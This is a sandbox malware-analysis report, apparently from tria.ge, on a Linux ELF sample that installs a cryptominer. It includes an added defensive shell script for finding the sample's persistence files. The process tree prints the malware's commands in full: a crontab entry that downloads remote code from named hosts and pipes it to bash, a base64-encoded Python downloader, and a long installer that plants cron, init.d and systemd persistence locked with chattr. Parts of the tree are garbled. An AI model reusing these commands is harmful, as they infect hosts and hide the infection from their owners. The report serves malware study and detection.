Analysis
- max time kernel: 131s
- max time network: 132s
- platform: ubuntu-20.04_amd64
- resource: ubuntu2004-amd64-20240221-en
- resource tags: arch:amd64, arch:i386, image:ubuntu2004-amd64-20240221-en, kernel:5.4.0-169-generic, locale:en-us, os:ubuntu-20.04-amd64, system
- submitted: 24/02/2024, 19:04
Behavioral task: behavioral1
- Sample: bin.elf
- Resource: ubuntu2004-amd64-20240221-en
General
- Target: bin.elf
- Size: 3.8MB
- MD5: 1184bf04877dec9a4bbb24acd30c8d49
- SHA1: e68649a61a173c93775580ec0e975a3a87250e9d
- SHA256: 96a47e74c42f7cb2799ef064f413aeaeaf667662a3983b4e66556a827aa2481a
- SHA512: 25917099b31a0bd7b3fab4600c318c3a3acab5bb1c2dc8d7fbccfc22046fb7a551747065ad9016dba26d8de16a0782d4a7279a5b644c7802f4151c4d3184d104
- SSDEEP: 98304:e6M0JGEyxYXQKOscf3j3/DaNAq//XxsdQDYpexnaG4oDhAJ:i0JZ8yysw3zDuTXqQD+exawDhY
Malware Config
Signatures
Detects Kaiten/Tsunami Payload (1 IoC)
- yara_rule family_kaiten2 matched resource behavioral1/memory/2013-2-0x00007fec9ea38000-0x00007fec9ea4c700-memory.dmp
Detects Kaiten/Tsunami payload (1 IoC)
- yara_rule family_kaiten matched resource behavioral1/memory/2013-2-0x00007fec9ea38000-0x00007fec9ea4c700-memory.dmp
Executes dropped EXE (1 IoC)
- /etc/init.d/knlib executed as process knlib (pid 1499)
Reads EFI boot settings (10 IoCs)
Reads EFI boot settings from the efivars filesystem, which may contain security secrets or sensitive data.
- File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 by systemctl (the same entry is recorded 10 times)
yara_rule upx (1 IoC)
- yara_rule upx matched resource behavioral1/files/fstream-8.dat
Attempts to change immutable files (14 IoCs)
Modifies inode attributes on the filesystem to allow changing of immutable files.
- pid/process: 2172 sed, 2351 sh, 2354 hostname, 2167 chattr, 2058 chattr, 2070 sed, 2075 chattr, 2165 chattr, 2063 chattr, 2072 chattr, 2108 sed, 2060 sed, 2065 chattr, 2173 chattr
Checks CPU configuration (1 TTP, 6 IoCs)
Checks CPU information that indicates whether the system is a virtual machine.
- File opened for reading /proc/cpuinfo by bin.64 (2 times) and by grep (4 times)
Checks hardware identifiers (DMI) (1 TTP, 8 IoCs)
Checks DMI information that indicates whether the system is a virtual machine.
- File opened for reading by bin.64, each path twice: /sys/devices/virtual/dmi/id/bios_vendor, /sys/devices/virtual/dmi/id/sys_vendor, /sys/devices/virtual/dmi/id/product_name, /sys/devices/virtual/dmi/id/board_vendor
Creates/modifies Cron job (1 TTP, 15 IoCs)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
- File opened for modification /etc/cron.hourly/pwnrig by tee
- File opened for modification /etc/cron.monthly/pwnrig by tee
- File opened for modification /etc/cron.weekly/pwnrig by tee
- File opened for modification /etc/cron.weekly/sedVM9D8G by sed
- File opened for modification /var/spool/cron/crontabs/tmp.9tob60 by crontab
- File opened for modification /var/spool/cron/crontabs/tmp.T4nqKV by crontab
- File opened for modification /etc/cron.d/pwnrig by tee
- File opened for modification /etc/cron.daily/pwnrig by tee
- File opened for modification /etc/cron.d/sedn6k6uK by sed
- File opened for modification /var/spool/cron/crontabs/tmp.lAHWI7 by crontab
- File opened for modification /etc/cron.daily/sedTFT2VK by sed
- File opened for modification /etc/cron.hourly/sedQpqhUK by sed
- File opened for modification /etc/cron.monthly/sedHnDuhH by sed
- File opened for modification /var/spool/cron/crontabs/tmp.Pf2Sis by crontab
- File opened for modification /var/spool/cron/crontabs/tmp.FYiU5t by crontab
Enumerates running processes
Discovers information about currently running processes on the system.
Modifies init.d
- File opened for modification /etc/init.d/pwnrig by tee
- File opened for modification /etc/init.d/sedAMNbQA by sed
- File opened for modification /etc/init.d/knlib by bin.elf
Modifies systemd (1 TTP, 3 IoCs)
Adds or modifies systemd service files, likely to achieve persistence.
- File opened for modification /etc/systemd/system/knlibe.service by bin.elf
- File opened for modification /lib/systemd/system/pwnrigl.service by tee
- File opened for modification /etc/systemd/system/pwnrige.service by tee
Reads CPU attributes (1 TTP, 12 IoCs)
- File opened for reading /sys/devices/system/cpu/types by bin.64 (2 times)
- File opened for reading /sys/devices/system/cpu/online by ps (6 times) and by bin.64 (2 times)
- File opened for reading /sys/devices/system/cpu/possible by bin.64 (2 times)
Reads hardware information (1 TTP, 28 IoCs)
Accesses system information such as serial numbers and manufacturer names.
- File opened for reading by bin.64, each path twice, under /sys/devices/virtual/dmi/id/: board_name, chassis_vendor, chassis_type, chassis_asset_tag, bios_date, product_uuid, chassis_version, product_version, board_serial, board_version, bios_version, board_asset_tag, product_serial, chassis_serial
Writes file to system bin folder (1 TTP, 5 IoCs)
- File opened for modification /bin/knlib by bin.elf
- File opened for modification /bin/bprofr by cp
- File opened for modification /bin/crondr by cp
- File opened for modification /bin/initdr by cp
- File opened for modification /bin/sysdr by cp
Enumerates kernel/hardware configuration (1 TTP, 64 IoCs)
Reads contents of the /sys virtual filesystem to enumerate system information (64 reads of cpu topology, cache, NUMA node and cgroup entries by bin.64, plus efivars reads by systemctl).
Reads runtime system information (64 IoCs)
Reads data from the /proc virtual filesystem (64 reads, almost all of /proc/PID/stat, /proc/PID/status and /proc/PID/cmdline by ps, plus /proc/filesystems by mkdir, /proc/1/environ by systemctl and /proc/sys/kernel/osrelease by ps).
Writes file to tmp directory (8 IoCs)
Malware often drops required files in the /tmp directory.
- File opened for modification /tmp/~/.bash_profile by sh
- File opened for modification /tmp/.lock by bin.64
- File opened for modification /tmp/bi.64 by bin.elf
- File opened for modification /tmp/bin.64 by bin.elf
- File opened for modification /tmp/.klibsystem4.lock by bin.elf
- File opened for modification /tmp/bin.64 (process not found)
- File opened for modification /tmp/bi.64 (process not found)
- File opened for modification /tmp/.bashirc by bi.64
GoLang User-Agent (15 IoCs)
Uses the default User-Agent string set by the Go HTTP packages.
- HTTP User-Agent header Go-http-client/1.1 observed on flows 23, 33, 40, 50, 52, 54, 56, 58, 60, 62, 64, 66, 68, 70, 73
Processes
(Each entry is shown as: executable path (PID): command line; child processes are indented under their parent, and matched signatures are listed as bullets.)
/tmp/bin.elf (PID 1475): /tmp/bin.elf
  - Modifies init.d
  - Modifies systemd
  - Writes file to system bin folder
  - Writes file to tmp directory
  /usr/bin/bash (PID 1495): bash -c "rm -rf /etc/sysctl.conf ; echo fs.file-max = 2097152 > /etc/sysctl.conf ; sysctl -p ; ulimit -Hn ; ulimit -n 99999 -u 999999"
    /usr/bin/rm (PID 1496): rm -rf /etc/sysctl.conf
    /usr/sbin/sysctl (PID 1497): sysctl -p
  /usr/bin/chattr (PID 1498): chattr +ia /etc/init.d/knlib
  /etc/init.d/knlib (PID 1499): /etc/init.d/knlib start
    - Executes dropped EXE
    /usr/bin/cp (PID 1500): cp -f -r -- /bin/knlib /bin/klibsystem4
    /usr/bin/rm (PID 1502): rm -rf -- klibsystem4
    /usr/bin/nohup (PID 1501): nohup ./klibsystem4
  /usr/bin/chattr (PID 1503): chattr +ia /etc/systemd/system/knlibe.service
  /usr/bin/systemctl (PID 1505): systemctl daemon-reload
    - Reads EFI boot settings
  /usr/bin/systemctl (PID 1558): systemctl enable knlibe.service
    - Reads EFI boot settings
    - Enumerates kernel/hardware configuration
  /usr/bin/chattr (PID 1594): chattr +ia /bin/knlib
  /usr/bin/bash (PID 2554): bash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"
    /usr/bin/crontab (PID 2556): crontab -
      - Creates/modifies Cron job
  /usr/bin/ss (PID 2557): ss -ant
  /usr/bin/ss (PID 2558): ss -ant
  /usr/bin/ss (PID 2559): ss -ant
  /usr/bin/bash (PID 2567): bash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"
    /usr/bin/crontab (PID 2569): crontab -
      - Creates/modifies Cron job
  /usr/bin/ss (PID 2570): ss -ant
  /usr/bin/ss (PID 2571): ss -ant
  /usr/bin/ss (PID 2572): ss -ant
/usr/bin/klibsystem4 (PID 1501): ./klibsystem4
/usr/bin/bash (PID 2007): bash -c "echo '*/10 * * * * (curl -s http://185.172.128.146:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"
  /usr/bin/crontab (PID 2009): crontab -
    - Creates/modifies Cron job
/usr/bin/ss (PID 2010): ss -ant
/usr/bin/nohup (PID 2013): nohup /tmp/bi.64 "&"
/tmp/bi.64 (PID 2013): /tmp/bi.64 "&"
  - Writes file to tmp directory
/usr/bin/ss (PID 2015): ss -ant
/usr/bin/nohup (PID 2016): nohup /tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d -pwn "&"
/tmp/bin.64 (PID 2016): /tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d -pwn "&"
  - Checks CPU configuration
  - Checks hardware identifiers (DMI)
  - Reads CPU attributes
  - Reads hardware information
  - Enumerates kernel/hardware configuration
  /bin/sh (PID 2017): sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
    /usr/bin/whoami (PID 2028): whoami
    /usr/bin/hostname (PID 2029): hostname
    /usr/bin/grep (PID 2030): grep -c "^processor" /proc/cpuinfo
      - Checks CPU configuration
  /bin/sh (PID 2046): sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    /usr/bin/awk (PID 2048): awk "/[zZ]/ && !a[\$2]++ {print \$2}"
    /usr/bin/ps (PID 2047): ps -A "-ostat,ppid"
      - Reads CPU attributes
      - Reads runtime system information
    /usr/bin/id (PID 2050): id -u
    /usr/bin/grep (PID 2053): grep -v grep
    /usr/bin/grep (PID 2052): grep /etc/cron
    /usr/bin/ps (PID 2051): ps x
      - Reads CPU attributes
      - Reads runtime system information
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/bin.64';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER 
\$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e 
\"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"2⤵
- Writes file to tmp directory
PID:2055 -
/usr/bin/idid -u3⤵PID:2056
-
-
/usr/bin/idid -u3⤵PID:2057
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"3⤵
- Attempts to change immutable files
PID:2058
-
-
/usr/bin/rmrm -rf /bin/bprofr3⤵PID:2059
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"3⤵
- Attempts to change immutable files
PID:2060
-
-
/usr/bin/cpcp -f -r -- /tmp/bin.64 /bin/bprofr3⤵
- Writes file to system bin folder
PID:2061
-
-
/usr/bin/idid -u3⤵PID:2062
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"3⤵
- Attempts to change immutable files
PID:2063
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly3⤵
- Reads runtime system information
PID:2064
    /usr/bin/chattr: chattr -i -a "/etc/cron.*/pwnrig" /bin/crondr
      - Attempts to change immutable files
      PID: 2065
    /usr/bin/rm: rm -rf /bin/crondr
      PID: 2066
    /usr/bin/cp: cp -f -r -- /tmp/bin.64 /bin/crondr
      - Writes file to system bin folder
      PID: 2067
    /usr/bin/tee: tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
      - Creates/modifies Cron job
      PID: 2069
    /usr/bin/sed: sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
      - Attempts to change immutable files
      - Creates/modifies Cron job
      PID: 2070
    /usr/bin/chmod: chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
      PID: 2071
    /usr/bin/chattr: chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
      - Attempts to change immutable files
      PID: 2072
    /usr/bin/which: which chkconfig
      PID: 2073
    /usr/bin/which: which update-rc.d
      PID: 2074
    /usr/bin/chattr: chattr -i -a /etc/init.d/pwnrig /bin/initdr
      - Attempts to change immutable files
      PID: 2075
    /usr/sbin/update-rc.d: update-rc.d -f pwnrig disable
      PID: 2076
    /usr/sbin/update-rc.d: update-rc.d -f pwnrig remove
      PID: 2077
      /usr/local/sbin/systemctl: systemctl daemon-reload
        PID: 2078
      /usr/local/bin/systemctl: systemctl daemon-reload
        PID: 2078
      /usr/sbin/systemctl: systemctl daemon-reload
        PID: 2078
      /usr/bin/systemctl: systemctl daemon-reload
        - Reads EFI boot settings
        - Reads runtime system information
        PID: 2078
    /usr/bin/rm: rm -rf /bin/initdr
      PID: 2104
    /usr/bin/cp: cp -f -r -- /tmp/bin.64 /bin/initdr
      - Writes file to system bin folder
      PID: 2105
    /usr/bin/tee: tee /etc/init.d/pwnrig
      - Modifies init.d
      PID: 2107
    /usr/bin/sed: sed -i "1 s/-e //" /etc/init.d/pwnrig
      - Attempts to change immutable files
      - Modifies init.d
      PID: 2108
    /usr/bin/chmod: chmod +x /etc/init.d/pwnrig /bin/initdr
      PID: 2109
    /usr/sbin/update-rc.d: update-rc.d pwnrig defaults
      PID: 2110
      /usr/local/sbin/systemctl: systemctl daemon-reload
        PID: 2111
      /usr/local/bin/systemctl: systemctl daemon-reload
        PID: 2111
      /usr/sbin/systemctl: systemctl daemon-reload
        PID: 2111
      /usr/bin/systemctl: systemctl daemon-reload
        - Reads EFI boot settings
        PID: 2111
    /usr/sbin/update-rc.d: update-rc.d pwnrig enable
      PID: 2137
      /usr/local/sbin/systemctl: systemctl --quiet enable pwnrig
        PID: 2138
      /usr/local/bin/systemctl: systemctl --quiet enable pwnrig
        PID: 2138
      /usr/sbin/systemctl: systemctl --quiet enable pwnrig
        PID: 2138
      /usr/bin/systemctl: systemctl --quiet enable pwnrig
        - Reads EFI boot settings
        PID: 2138
      /usr/local/sbin/systemctl: systemctl daemon-reload
        PID: 2139
      /usr/local/bin/systemctl: systemctl daemon-reload
        PID: 2139
      /usr/sbin/systemctl: systemctl daemon-reload
        PID: 2139
      /usr/bin/systemctl: systemctl daemon-reload
        - Reads EFI boot settings
        PID: 2139
    /usr/bin/chattr: chattr +i +a /etc/init.d/pwnrig /bin/initdr
      - Attempts to change immutable files
      PID: 2165
    /usr/bin/which: which systemctl
      PID: 2166
    /usr/bin/chattr: chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
      - Attempts to change immutable files
      PID: 2167
    /usr/bin/rm: rm -rf /bin/sysdr
      PID: 2168
    /usr/bin/cp: cp -f -r -- /tmp/bin.64 /bin/sysdr
      - Writes file to system bin folder
      PID: 2169
    /usr/bin/tee: tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
      - Modifies systemd
      PID: 2171
    /usr/bin/sed: sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
      - Attempts to change immutable files
      PID: 2172
    /usr/bin/chattr: chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
      - Attempts to change immutable files
      PID: 2173
    /usr/bin/systemctl: systemctl enable pwnrige.service
      - Reads EFI boot settings
      PID: 2174
    /usr/bin/systemctl: systemctl enable pwnrigl.service
      - Reads EFI boot settings
      PID: 2200
    /usr/bin/systemctl: systemctl daemon-reload
      - Reads EFI boot settings
      - Enumerates kernel/hardware configuration
      PID: 2226
    /usr/bin/systemctl: systemctl reload-or-restart pwnrige.service
      - Reads EFI boot settings
      PID: 2252
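The chain above is the sample's persistence installer, repeated once each for cron, init.d and systemd: it clears the immutable and append-only attributes (chattr -i -a), drops a copy of /tmp/bin.64 under /bin as crondr, initdr and sysdr, writes the pwnrig loader files with tee, removes a leading "-e " from their first line with sed, marks them executable, registers them (update-rc.d, systemctl enable) and finally re-locks everything with chattr +i +a so that a plain rm or an editor fails on them. The groups of four systemctl lines that share one PID are a single execvp walking PATH (/usr/local/sbin, /usr/local/bin, /usr/sbin, /usr/bin). The hunt script below is an added example, not the report's output and not the sample's code: it checks a filesystem root for exactly the paths named in the tree and shows their attribute flags. The ROOT argument, the function names and the use of lsattr/chattr from e2fsprogs are this example's own choices.

```shell
#!/bin/sh
# Added hunting script (not part of the tria.ge report or of the sample).
# Looks for the persistence artefacts the process tree above shows being
# installed. Paths are taken verbatim from that tree; ROOT, the function
# names and the lsattr/chattr usage are this script's own choices.
#
# Usage: sh hunt_pwnrig.sh /            (live host)
#        sh hunt_pwnrig.sh /mnt/image   (mounted disk image)
# Exit status 1 means at least one artefact was found.

PWNRIG_PATHS="
/bin/crondr
/bin/initdr
/bin/sysdr
/etc/cron.d/pwnrig
/etc/cron.daily/pwnrig
/etc/cron.hourly/pwnrig
/etc/cron.monthly/pwnrig
/etc/cron.weekly/pwnrig
/etc/init.d/pwnrig
/lib/systemd/system/pwnrigl.service
/etc/systemd/system/pwnrige.service
"

# Print "<path><TAB><attribute flags>" for every artefact present under $1
# (default /). The installer runs "chattr +i +a" on all of them, so the flags
# column normally contains "i" and "a"; "?" means lsattr was unavailable or
# the filesystem does not support attributes. Returns 1 if anything was found.
hunt_pwnrig_persistence() {
    root="${1:-/}"
    found=0
    for p in $PWNRIG_PATHS; do
        f="${root%/}$p"
        [ -e "$f" ] || continue
        found=$((found + 1))
        flags=""
        if command -v lsattr >/dev/null 2>&1; then
            # lsattr prints e.g. "----ia--------e------- /etc/cron.d/pwnrig"
            flags=$(lsattr "$f" 2>/dev/null | awk '{print $1}')
        fi
        printf '%s\t%s\n' "$f" "${flags:-?}"
    done
    [ "$found" -eq 0 ]
}

# Removal helper for a live host (needs root): the +i/+a flags must be
# cleared first, otherwise rm fails with "Operation not permitted". Run
# "systemctl disable pwnrigl.service pwnrige.service" and
# "update-rc.d -f pwnrig remove" before deleting the unit/init files so the
# enablement symlinks are removed as well.
unlock_and_remove() {
    f="$1"
    chattr -i -a "$f" 2>/dev/null || true
    rm -f "$f"
}

if [ "$#" -gt 0 ]; then
    hunt_pwnrig_persistence "$1"
fi
```

The check is deliberately path-based rather than hash-based: the /bin copies are made with cp -f from whatever /tmp/bin.64 the loader dropped, so their hash follows the current build of the miner, while the file names and the +i/+a attributes stay the same across the three persistence variants.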
/usr/bin/hostname: hostname -I
  PID: 2020
/usr/bin/awk: awk "{print \$1}"
  PID: 2022
/usr/bin/awk: awk "{print \"-\"\$2}"
  PID: 2027
/usr/bin/head: head -n 1
  PID: 2026
/usr/bin/grep: grep "Port "
  PID: 2025
/usr/bin/cat: cat /etc/ssh/sshd_config
  PID: 2024
/usr/bin/sed: sed -e "s/\$//"
  PID: 2036
/usr/bin/sed: sed -e "s/^ *//"
  PID: 2035
/usr/bin/cut: cut -d: -f2
  PID: 2034
/usr/bin/grep: grep -m 1 "model name" /proc/cpuinfo
  - Checks CPU configuration
  PID: 2033
/usr/bin/awk: awk "{print \$1}"
  PID: 2039
/usr/bin/awk: awk "{print \$4}"
  PID: 2042
/usr/bin/awk: awk "{print \$4}"
  PID: 2045
/usr/bin/ss: ss -ant
  PID: 2309
